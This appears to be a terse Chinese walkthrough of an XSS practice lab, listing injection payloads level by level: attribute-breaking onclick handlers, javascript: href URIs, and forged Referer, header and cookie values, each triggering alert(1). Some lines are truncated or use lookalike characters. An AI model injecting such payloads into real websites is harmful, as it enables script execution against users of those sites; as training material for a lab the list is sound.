1.//
3.?keyword=’+οnclick='alert(1)
4.?keyword=" οnclick=“alert(1)
5.?keyword=”>
6."><a Href='javascript:alert(1)
7.11">a//
8.根据源码发现直接输入href的值,javascript:alert(1)然后转译为HTML:javascript:alert(1)
9.javascript:alert(/xss/)//http://www.baidu.com
10.?keyword=well&t_link=&t_history=&t_sort="type=“text” οnclick=“alert(1)”
11.抓包,修改referer:"type=“text” οnclick=“alert(1)”,在第10关通过后到11关的包。
12.伪造头:1"type=“text” οnclick="alert(1)
13.cookie伪造:cookie:user=1"type=“text” οnclick="alert(1)
XSS 部分
最新推荐文章于 2024-07-19 11:51:38 发布